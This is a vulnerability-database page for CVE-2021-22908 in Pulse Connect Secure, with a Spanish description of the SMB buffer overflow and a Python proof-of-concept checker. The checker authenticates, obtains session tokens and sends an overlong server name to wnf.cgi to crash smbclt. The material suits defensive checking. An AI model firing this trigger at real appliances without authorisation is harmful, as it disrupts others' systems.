CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_es

# CVE-2021-22908 Pulse Connect Secure 任意代碼執行漏洞/es

== Descripción de la vulnerabilidad ==

Debido a que PCS admite la conexión al uso compartido de archivos de Windows (SMB), la función la proporcionan los scripts CGI basados ​​en las bibliotecas y aplicaciones auxiliares de Samba 4.5.10. Al especificar un nombre de servidor largo para ciertas operaciones SMB, la aplicación smbclt puede fallar debido al desbordamiento del búfer, dependiendo de la longitud del nombre de servidor especificado.

Se ha confirmado que el sistema PCS 9.1R11.4 tiene esta vulnerabilidad. El punto final CGI de destino es /dana/fb/smb/wnf.cgi. Otros puntos finales CGI también pueden desencadenar esta vulnerabilidad.

Si un atacante no puede limpiar después de aprovechar con éxito esta vulnerabilidad, especificar un nombre de servidor largo puede resultar en las siguientes entradas de registro de eventos de PCS:

Critical ERR31093 2021-05-24 14:05:37 - ive - [127.0.0.1] Root::System()[] - Program smbclt recently failed.

Pero para aprovechar esta vulnerabilidad, el servidor PCS debe tener una política de acceso a archivos de Windows que permita \\ * u otra política que permita a un atacante conectarse a cualquier servidor. Puede ver la política SMB actual en Usuario-> Política de recursos-> Política de acceso a archivos de Windows en la página de administración de PCS. 9.1R2 y los dispositivos PCS anteriores utilizan la política predeterminada de permitir conexiones a cualquier host SMB. A partir de 9.1R3, esta política se ha cambiado del permiso predeterminado al rechazo predeterminado.

== Alcance de influencia ==
Pulse Connect Secure 9.0RX and 9.1RX

==POC==

#!/usr/bin/env python3
# Utility to check for Pulse Connect Secure CVE-2021-22908
# https://www.kb.cert.org/vuls/id/667933

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import argparse
import sys
from html.parser import HTMLParser
import getpass

parser = argparse.ArgumentParser(description='Pulse Connect Secure CVE-2021-22908')
parser.add_argument('host', type=str, help='PCS IP or hostname)')
parser.add_argument('-u', '--user', dest='user', type=str, help='username')
parser.add_argument('-p', '--pass', dest='password', type=str, help='password')
parser.add_argument('-r', '--realm', dest='realm', type=str, help='realm')
parser.add_argument('-d', '--dsid', dest='dsid', type=str, help='DSID')
parser.add_argument('-x', '--xsauth', dest='xsauth', type=str, help='xsauth')
parser.add_argument('-n', '--noauth', action='store_true', help='Do not authenticate. Only check for XML workaround')

args = parser.parse_args()

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class formvaluefinder(HTMLParser):
    def __init__(self, searchval):
        super(type (self), self).__init__()
        self.searchval = searchval
    def handle_starttag(self, tag, attrs):
        if tag == 'input':
            # We're just looking for form  tags
            foundelement = False
            for attr in attrs:
                if(attr[0] == 'name'):
                    if(attr[1] == self.searchval):
                        foundelement = True
                elif(attr[0] == 'value' and foundelement == True):
                     self.data = attr[1]

class preauthfinder(HTMLParser):
    foundelement = False
    def handle_starttag(self, tag, attrs):
        if tag == 'textarea':
            # We're just looking for  tags
            foundelement = False
            for attr in attrs:
                if(attr[0] == 'id'):
                    if(attr[1] == 'sn-preauth-text_2'):
                        self.foundelement = True
    def handle_data(self, data):
        if self.foundelement:
            self.data = data
            self.foundelement = False



def get_realm(host, defaulturi):
    realm = None
    print('Getting default realm for %s...' % host)
    url = 'https://%s%s' % (host,defaulturi)
    res = None
    try:
        res = requests.get(url, verify=False, timeout=10)
    except requests.exceptions.ConnectionError:
        print('Error retrieving %s' % url)

    if res:
        if res.status_code == 200:
            html = str(res.content)
            if 'sn-preauth-text_2' in html:
                print('Preauth required...')
                parser = preauthfinder()
                parser.feed(html)
                preauthtext = parser.data
                values = {'sn-preauth-text': preauthtext, 'sn-preauth-proceed': 'Proceed'}
                res = requests.post(res.url, data=values, verify=False, allow_redirects=False, timeout=10)
                if res.content:
                    parser = formvaluefinder('realm')
                    parser.feed(str(res.content))
                    realm = parser.data
                else:
                    print('Error retrieving login page')

            else:
                parser = formvaluefinder('realm')
                parser.feed(html)
                realm = parser.data
    return realm

def get_dsid(host, defaulturi, realm, user, password):
    dsid = None
    loginuri = defaulturi.replace('welcome.cgi', 'login.cgi')
    url = 'https://%s%s' % (host,loginuri)
    values = {'username': user, 'password': password, 'realm': realm, 'btnSubmit': 'Sign In'}
    res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
    if 'confirm' in res.headers['location']:
        # Redirect to "user-confirm" that they still want to log in, despite already
        # having an active session
        print('User session is already active! Proceeding...')
        res = requests.post(url, data=values, verify=False, allow_redirects=True, timeout=10)
        parser = formvaluefinder('FormDataStr')
        parser.feed(str(res.content))
        formdata = parser.data
        values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
        res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
        for cookie in res.cookies:
            if cookie.name == 'DSID':
                dsid = cookie.value
    elif 'cred' in res.headers['location']:
        # This is a pulse that requires 2FA
        res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
        for cookie in res.cookies:
            if cookie.name == 'id':
                key = cookie.value
        password2 = input('MFA code: ')
        values = {'key': key, 'password#2': password2, 'btnSubmit': 'Sign In'}
        cookies = {'id': key, 'DSSigninNotif': '1'}
        res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
        if 'confirm' in res.headers['location']:
            # Redirect to "user-confirm" that they still want to log in, despite already
            # having an active session
            print('User session is already active! Proceeding...')
            res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
            parser = formvaluefinder('FormDataStr')
            parser.feed(str(res.content))
            formdata = parser.data
            values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
            res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
            for cookie in res.cookies:
                if cookie.name == 'DSID':
                    dsid = cookie.value
        else:
            for cookie in res.cookies:
                if cookie.name == 'DSID':
                    dsid = cookie.value
    elif 'failed' in res.headers['location']:
        print('Login failed!')
    else:
        # Login accepted
        for cookie in res.cookies:
            if cookie.name == 'DSID':
                dsid = cookie.value

    return dsid


def get_xsauth(host, dsid):
    xsauth = None
    url = 'https://%s/dana/home/index.cgi' % host
    cookies = {'DSID':dsid}
    res = requests.get(url, verify=False, cookies=cookies, timeout=10)
    if 'xsauth' in str(res.content):
        parser = formvaluefinder('xsauth')
        parser.feed(str(res.content))
        xsauth = parser.data
    else:
        print('Cannot find xsauth string for provided DSID: %s' % dsid)
    return xsauth

def trigger_vul(host, dsid, xsauth):
    url = 'https://%s/dana/fb/smb/wnf.cgi' % host
    values = {
        't': 's',
        'v': '%s,,' % ('A' * 1800),
        'dir': 'tmp',
        'si': None,
        'ri': None,
        'pi': None,
        'confirm': 'yes',
        'folder': 'tmp',
        'acttype': 'create',
        'xsauth': xsauth,
        'create': 'Create Folder',
        }
    cookies = {'DSID': dsid}
    try:
        res = requests.post(url, data=values, verify=False, allow_redirects=False, cookies=cookies, timeout=60)
        status = res.status_code
        if 'DSIDFormDataStr' in str(res.content):
            # We got page asking to confirm our action
            print('xsauth value was not accepted')
        else:
            if status == 200 and 'Error FB-8' in str(res.content):
                print('HTTP %s.  Windows File Access Policies prevents exploitation.' % status)
            elif status == 200:
                print('HTTP %s.  Not vulnerable.' % status)
            elif status == 403:
                print('HTTP %s.  XML workaround applied.' % status)
            elif status == 500:
                print('HTTP %s.  %s is vulnerable to CVE-2021-22908!' % (status, host))
            elif status == 302:
                print('HTTP %s.  Are you sure your DSID is valid?' % host)
            else:
                print('HTTP %s.  Not sure how to interpret this result.' % status)
    except requests.exceptions.ReadTimeout:
        print('No response from server. Try again...')


def get_default(host):
    url = 'https://%s' % host
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    try:
        location = res.headers['location']
        if 'dana-na' not in location:
            print('%s does not seem to be a PCS host' % host)
            location = None
    except:
        pass
    return location

def check_xml(host):
    url = 'https://%s/dana/meeting' % host
    #print('Checking status of %s ...' % url)
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    if res.status_code == 403:
        print('Workaround-2104 appears to be installed')
    else:
        print('Workaround-2104 does NOT seem to be installed. Hope you are on R11.4 or later!')

    url = 'https://%s/dana-cached/fb/smb/wfmd.cgi' % host
    #print('Checking status of %s ...' % url)
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    if res.status_code == 403:
        print('Workaround-2105 appears to be installed')
    else:
        print('Workaround-2105 does NOT seem to be installed. Hope you are on R11.5 or later!')


host = args.host
if args.noauth:
    check_xml(host)
else:
    defaulturi = get_default(host)
    if defaulturi:

        if not args.realm:
            realm = get_realm(host, defaulturi)
        else:
            realm = args.realm

        if realm:
            print('Realm: %s' % realm)
            if not args.user and not args.dsid:
                user = input('User: ')
            else:
                user = args.user
            if not args.password and not args.dsid:
                password = getpass.getpass()
            else:
                password = args.password
            if not args.dsid:
                dsid = get_dsid(host, defaulturi, realm, user, password)
                print('DSID: %s' % dsid)
            else:
                dsid = args.dsid
            if dsid:
                if not args.xsauth:
                    xsauth = get_xsauth(host, dsid)
                    print('xsauth: %s' % xsauth)
                else:
                    xsauth = args.xsauth
                if xsauth:
                    trigger_vul(host, dsid, xsauth)
</pre>
<p>== Referencia ==<br />
https://short.pwnwiki.org/?c=1NiPen</p>
<p>https://short.pwnwiki.org/?c=2Um6Rb</p>
                    </div>
        <div class="em09 muted-3-color"><div><span>©</span> 版权声明</div><div class="posts-copyright">文章版权归作者所有，未经允许请勿转载。</div></div><div class="text-center theme-box muted-3-color box-body separator em09">THE END</div><div class="theme-box article-tags"><a class="but ml6 radius c-blue" title="查看更多分类文章" href="https://vip.bdziyi.com/category/ldxq/"><i class="fa fa-folder-open-o" aria-hidden="true"></i>漏洞库</a><br></div>    </div>
    <div class="text-center muted-3-color box-body em09">喜欢就支持一下吧</div><div class="text-center post-actions"><a href="javascript:;" data-action="like" class="action action-like" data-pid="2070"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-like"></use></svg><text>点赞</text><count>0</count></a><a href="javascript:;" data-toggle="modal" data-target="#rewards-modal-1" data-remote="https://vip.bdziyi.com/wp-admin/admin-ajax.php?id=1&action=user_rewards_modal" class="rewards action action-rewards"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-money"></use></svg><text>赞赏</text></a><span class="hover-show dropup action action-share">
        <svg class="icon" aria-hidden="true"><use xlink:href="#icon-share"></use></svg><text>分享</text><div class="zib-widget hover-show-con share-button dropdown-menu"><div><a rel="nofollow" class="share-btn qzone"  target="_blank" title="QQ空间" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=https://vip.bdziyi.com/2070/&title=CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_es-棉花糖会员站&pics=https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg&summary=# CVE-2021-22908 Pulse Connect Secure 任意代碼執行漏洞/es == Descripción de la vulnerabilidad == Debido a que PCS admite la conexión al uso compartido de archivos de Windows (SMB), la función la proporcionan los scripts CGI basados ​​en las bibliotecas y aplicaciones auxiliares de Samba 4.5.10. Al especificar un n..."><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qzone-color"></use></svg></icon><text>QQ空间<text></a><a rel="nofollow" class="share-btn weibo"  target="_blank" title="微博" href="https://service.weibo.com/share/share.php?url=https://vip.bdziyi.com/2070/&title=CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_es-棉花糖会员站&pic=https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg&searchPic=false"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-weibo-color"></use></svg></icon><text>微博<text></a><a rel="nofollow" class="share-btn qq"  target="_blank" title="QQ好友" href="https://connect.qq.com/widget/shareqq/index.html?url=https://vip.bdziyi.com/2070/&title=CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_es-棉花糖会员站&pics=https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg&desc=# CVE-2021-22908 Pulse Connect Secure 任意代碼執行漏洞/es == Descripción de la vulnerabilidad == Debido a que PCS admite la conexión al uso compartido de archivos de Windows (SMB), la función la proporcionan los scripts CGI basados ​​en las bibliotecas y aplicaciones auxiliares de Samba 4.5.10. Al especificar un n..."><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-color"></use></svg></icon><text>QQ好友<text></a><a rel="nofollow" class="share-btn poster" poster-share="2070" title="海报分享" href="javascript:;"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-poster-color"></use></svg></icon><text>海报分享<text></a><a rel="nofollow" class="share-btn copy" data-clipboard-text="https://vip.bdziyi.com/2070/" data-clipboard-tag="链接" title="复制链接" href="javascript:;"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-copy-color"></use></svg></icon><text>复制链接<text></a></div></div></span><a href="javascript:;" class="action action-favorite signin-loader" data-pid="2070"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-favorite"></use></svg><text>收藏</text><count></count></a></div></article><div class="yiyan-box main-bg theme-box text-center box-body radius8 main-shadow"><div data-toggle="tooltip" data-original-title="点击切换一言" class="yiyan"></div></div><div class="user-card zib-widget author">
        <div class="card-content mt10 relative">
            <div class="user-content">
                
                <div class="user-avatar"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-img avatar-lg"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a></div>
                <div class="user-info mt20 mb10">
                    <div class="user-name flex jc"><name class="flex1 flex ac"><a class="display-name text-ellipsis " href="https://vip.bdziyi.com/author/1/">棉花糖</a><icon data-toggle="tooltip" title="站长" class="user-auth-icon ml3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-auth"></use></svg></icon><img  class="lazyload ml3 img-icon medal-icon" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/medal/medal-28.svg" data-toggle="tooltip" title="年度发烧元老"  alt="徽章-年度发烧元老-棉花糖会员站"><img  class="lazyload img-icon ml3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://oss.bdziyi.com/vip/2024/09/20240921093141389.png" data-toggle="tooltip" title="LV7" alt="等级-LV7-棉花糖会员站"><a href="javascript:;" class="focus-color ml10 follow flex0 signin-loader" data-pid="1"><count><i class="fa fa-heart-o mr3" aria-hidden="true"></i>关注</count></a></name></div>
                    <div class="author-tag mt10 mini-scrollbar"><a class="but c-blue-2 tag-forum-post" data-toggle="tooltip" title="共0篇帖子" href="https://vip.bdziyi.com/author/1/?tab=forum"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg>0</a><a class="but c-blue tag-posts" data-toggle="tooltip" title="共1.3W+篇文章" href="https://vip.bdziyi.com/author/1/"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-post"></use></svg>1.3W+</a><a class="but c-green tag-comment" data-toggle="tooltip" title="共959条评论" href="https://vip.bdziyi.com/author/1/?tab=comment"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-comment"></use></svg>959</a><a class="but c-yellow tag-follow" data-toggle="tooltip" title="共351个粉丝" href="https://vip.bdziyi.com/author/1/?tab=follow"><i class="fa fa-heart em09"></i>351</a><span class="badg c-red tag-view" data-toggle="tooltip" title="人气值 168W+"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hot"></use></svg>168W+</span></div>
                    <div class="user-desc mt10 muted-2-color em09">公众号：棉花糖fans</div>
                    
                </div>
            </div>
            <div class="swiper-container more-posts swiper-scroll"><div class="swiper-wrapper"><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/77/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="会员必看手册（1.8.8版本 25.12.12更新）-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">会员必看手册（1.8.8版本 25.12.12更新）</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">会员必看手册（1.8.8版本 25.12.12更新）</div><div class="px12 opacity8 mt6"><item>2025年12月1日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 3.7W+</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/57589/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/biji/202506011606395.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">mingdon 明动 burp插件0.2.6版本 本地时间校验去除版</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">mingdon 明动 burp插件0.2.6版本 本地时间校验去除版</div><div class="px12 opacity8 mt6"><item>2025年7月3日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1.5W+</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/53919/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2025/03/20250310133450331.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="独家!超强代码审计工具上线！免费会员等你来嫖！-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">独家!超强代码审计工具上线！免费会员等你来嫖！</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">独家!超强代码审计工具上线！免费会员等你来嫖！</div><div class="px12 opacity8 mt6"><item>2024年12月17日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 8560</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58468/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401083217388.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="2025 hw 有poc的漏洞集合-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">2025 hw 有poc的漏洞集合</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">2025 hw 有poc的漏洞集合</div><div class="px12 opacity8 mt6"><item>2025年7月31日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 6255</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/129/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240626133442218.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="技术文章投稿兑换会员规则-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">技术文章投稿兑换会员规则</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">技术文章投稿兑换会员规则</div><div class="px12 opacity8 mt6"><item>2024年3月25日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 4555</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/10860/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401084118281.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="王老师src真正的完整版（49个学生分享视频版本）-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">王老师src真正的完整版（49个学生分享视频版本）</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">王老师src真正的完整版（49个学生分享视频版本）</div><div class="px12 opacity8 mt6"><item>2024年6月8日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 3726</item></div></div></div></a></div></div><div class="swiper-button-prev"></div><div class="swiper-button-next"></div></div>
        </div>
    </div>    <div class="theme-box" style="height:99px">
        <nav class="article-nav">
            <div class="main-bg box-body radius8 main-shadow">
                <a href="https://vip.bdziyi.com/1822/">
                    <p class="muted-2-color"><i class="fa fa-angle-left em12"></i><i
                            class="fa fa-angle-left em12 mr6"></i>上一篇</p>
                    <div class="text-ellipsis-2">
                        ProjeQtOr_Project_Management_9.1.4_遠程代碼執行漏洞                    </div>
                </a>
            </div>
            <div class="main-bg box-body radius8 main-shadow">
                <a href="https://vip.bdziyi.com/2208/">
                    <p class="muted-2-color">下一篇<i class="fa fa-angle-right em12 ml6"></i><i
                            class="fa fa-angle-right em12"></i></p>
                    <div class="text-ellipsis-2">
                        DataSIMS_Avionics_ARINC_664-1_本地緩衝區溢出漏洞                    </div>
                </a>
            </div>
        </nav>
    </div>
<div class="theme-box relates relates-thumb">
            <div class="box-body notop">
                <div class="title-theme">相关推荐</div>
            </div><div class="zib-widget"><div class="swiper-container swiper-scroll"><div class="swiper-wrapper"><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58468/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401083217388.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="2025 hw 有poc的漏洞集合-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">2025 hw 有poc的漏洞集合</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">2025 hw 有poc的漏洞集合</div><div class="px12 opacity8 mt6"><item>2025年7月31日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 6255</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58091/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">金蝶EAS autoLogin.jsp远程代码执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">金蝶EAS autoLogin.jsp远程代码执行</div><div class="px12 opacity8 mt6"><item>2025年7月4日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2420</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58988/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="百度网盘Windows客户端存在远程命令执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">百度网盘Windows客户端存在远程命令执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">百度网盘Windows客户端存在远程命令执行</div><div class="px12 opacity8 mt6"><item>2025年9月4日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2291</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58241/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="大华 evo-runs/v1.0/receive RCE-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">大华 evo-runs/v1.0/receive RCE</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">大华 evo-runs/v1.0/receive RCE</div><div class="px12 opacity8 mt6"><item>2025年7月11日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1972</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58301/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="wps 远程代码执行 rce-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">wps 远程代码执行 rce</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">wps 远程代码执行 rce</div><div class="px12 opacity8 mt6"><item>2025年7月18日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1810</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58089/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="爱数AnyShare智能内容管理平台 start_service
 存在远程命令执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">爱数AnyShare智能内容管理平台 start_service
 存在远程命令执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">爱数AnyShare智能内容管理平台 start_service
 存在远程命令执行</div><div class="px12 opacity8 mt6"><item>2025年7月4日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1700</item></div></div></div></a></div></div><div class="swiper-button-prev"></div><div class="swiper-button-next"></div></div></div></div><div class="theme-box" id="comments">
	<div class="box-body notop">
		<div class="title-theme">评论			<small>抢沙发</small></div>
	</div>

	<div class="no_webshot main-bg theme-box box-body radius8 main-shadow">
									<div class="comment-signarea text-center box-body radius8">
					<h3 class="text-muted em12 theme-box muted-3-color">请登录后发表评论</h3>
					<p>
						<a href="javascript:;" class="signin-loader but c-blue padding-lg"><i class="fa fa-fw fa-sign-in mr10" aria-hidden="true"></i>登录</a>
						<a href="javascript:;" class="signup-loader ml10 but c-yellow padding-lg"><svg class="icon mr10" aria-hidden="true"><use xlink:href="#icon-signup"></use></svg>注册</a>					</p>
					<p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://vip.bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fvip.bdziyi.com%2F2070%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div>				</div>
									<div id="postcomments">
			<ol class="commentlist list-unstyled">
				<div class="text-center comment-null" style="padding:30px 0;"><img style="width:280px;opacity: .7;" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/null-user.svg"><p style="margin-top:30px;" class="em09 muted-3-color separator">请登录后查看评论内容</p></div>			</ol>
		</div>
			</div>
</div>        </div>
    </div>
    <div class="sidebar">
	<div class="mb20"><div class="box-body notop"><div class="title-theme">作者</div></div><div class="user-card zib-widget widget"><div class="user-cover graphic" style="padding-bottom: 50%;"><img  class="lazyload fit-cover user-cover user-cover-id-1" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-lg.svg" data-src="https://oss.bdziyi.com/vip/2024/11/20241126045446604.png" alt="用户封面"></div>
        <div class="card-content mt10 relative">
            <div class="user-content">
                
                <div class="user-avatar"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-img avatar-lg"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a></div>
                <div class="user-info mt20 mb10">
                    <div class="user-name flex jc"><name class="flex1 flex ac"><a class="display-name text-ellipsis " href="https://vip.bdziyi.com/author/1/">棉花糖</a><icon data-toggle="tooltip" title="站长" class="user-auth-icon ml3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-auth"></use></svg></icon><img  class="lazyload ml3 img-icon medal-icon" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/medal/medal-28.svg" data-toggle="tooltip" title="年度发烧元老"  alt="徽章-年度发烧元老-棉花糖会员站"><img  class="lazyload img-icon ml3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://oss.bdziyi.com/vip/2024/09/20240921093141389.png" data-toggle="tooltip" title="LV7" alt="等级-LV7-棉花糖会员站"><a href="javascript:;" class="focus-color ml10 follow flex0 signin-loader" data-pid="1"><count><i class="fa fa-heart-o mr3" aria-hidden="true"></i>关注</count></a></name></div>
